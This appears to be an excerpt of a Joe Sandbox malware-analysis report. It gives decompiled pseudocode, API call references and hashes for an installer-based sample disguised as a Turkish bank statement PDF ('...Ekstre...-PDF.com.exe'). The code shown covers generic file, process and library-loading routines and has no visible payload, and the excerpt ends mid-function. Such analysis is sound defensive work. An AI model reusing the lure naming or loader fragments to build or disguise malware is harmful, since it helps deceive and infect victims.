                                                                                              0x00403396
                                                                                              0x00403396
                                                                                              0x0040339e
                                                                                              0x004033a5
                                                                                              0x004033b7
                                                                                              0x004033be
                                                                                              0x00403463
                                                                                              0x00403463
                                                                                              0x00000000
                                                                                              0x004033c4
                                                                                              0x004033c7
                                                                                              0x004033d3
                                                                                              0x004033d7
                                                                                              0x00403471
                                                                                              0x00403471
                                                                                              0x004033dd
                                                                                              0x004033e0
                                                                                              0x0040343f
                                                                                              0x00403445
                                                                                              0x00403447
                                                                                              0x00403447
                                                                                              0x00403459
                                                                                              0x00403461
                                                                                              0x00403468
                                                                                              0x0040346b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004033e2
                                                                                              0x004033e5
                                                                                              0x00000000
                                                                                              0x004033eb
                                                                                              0x004033f0
                                                                                              0x004033f7
                                                                                              0x004033fa
                                                                                              0x004033fc
                                                                                              0x004033fc
                                                                                              0x00403409
                                                                                              0x0040340c
                                                                                              0x00403413
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040341c
                                                                                              0x00403423
                                                                                              0x0040343b
                                                                                              0x00403465
                                                                                              0x00403465
                                                                                              0x00403425
                                                                                              0x00403425
                                                                                              0x00403428
                                                                                              0x0040342b
                                                                                              0x00403431
                                                                                              0x00403437
                                                                                              0x00000000
                                                                                              0x00403439
                                                                                              0x00000000
                                                                                              0x00403439
                                                                                              0x00403437
                                                                                              0x00000000
                                                                                              0x00403423
                                                                                              0x00000000
                                                                                              0x004033f0
                                                                                              0x004033e5
                                                                                              0x004033e0
                                                                                              0x004033d7
                                                                                              0x004033be
                                                                                              0x00403473
                                                                                              0x00403476

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                              • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                              • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                              • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 69%
                                                                                              			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                                                                                              0x0040138a
                                                                                              0x004013fa
                                                                                              0x0040139b
                                                                                              0x004013a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004013a2
                                                                                              0x004013a3
                                                                                              0x004013ad
                                                                                              0x00000000
                                                                                              0x00401404
                                                                                              0x004013b0
                                                                                              0x004013b7
                                                                                              0x004013bd
                                                                                              0x004013be
                                                                                              0x004013c0
                                                                                              0x004013c2
                                                                                              0x004013b9
                                                                                              0x004013b9
                                                                                              0x004013ba
                                                                                              0x004013ba
                                                                                              0x004013c9
                                                                                              0x004013cb
                                                                                              0x004013f4
                                                                                              0x004013f4
                                                                                              0x004013c9
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                              • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                              • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                              • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                              • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                              0x00405c54
                                                                                              0x00405c74
                                                                                              0x00405c7c
                                                                                              0x00405c81
                                                                                              0x00000000
                                                                                              0x00405c87
                                                                                              0x00405c8b

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3712363035-0
                                                                                              • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                              • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                                              • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                              • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                              0x00406a3d
                                                                                              0x00406a40
                                                                                              0x00406a47
                                                                                              0x00406a4f
                                                                                              0x00406a5b
                                                                                              0x00000000
                                                                                              0x00406a62
                                                                                              0x00406a52
                                                                                              0x00406a59
                                                                                              0x00000000
                                                                                              0x00406a6a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                                • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2547128583-0
                                                                                              • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                              • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                              • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                              • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 68%
                                                                                              			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                              0x0040615c
                                                                                              0x00406169
                                                                                              0x0040617e
                                                                                              0x00406184

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                                                              0x00406138
                                                                                              0x0040613e
                                                                                              0x00406143
                                                                                              0x0040614c
                                                                                              0x0040614c
                                                                                              0x00406155

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                              • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                              • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                              0x00405c1c
                                                                                              0x00405c24
                                                                                              0x00000000
                                                                                              0x00405c2a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                              • GetLastError.KERNEL32 ref: 00405C2A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1375471231-0
                                                                                              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                              • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                              • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                              0x0040620e
                                                                                              0x0040621e
                                                                                              0x00406226
                                                                                              0x00000000
                                                                                              0x0040622d
                                                                                              0x00000000
                                                                                              0x0040622f

                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040F692,0040CEF0,00403579,0040CEF0,0040F692,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                              • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                              • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                              0x004061df
                                                                                              0x004061ef
                                                                                              0x004061f7
                                                                                              0x00000000
                                                                                              0x004061fe
                                                                                              0x00000000
                                                                                              0x00406200

                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                              • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                              • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                              0x00403606
                                                                                              0x0040360c

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
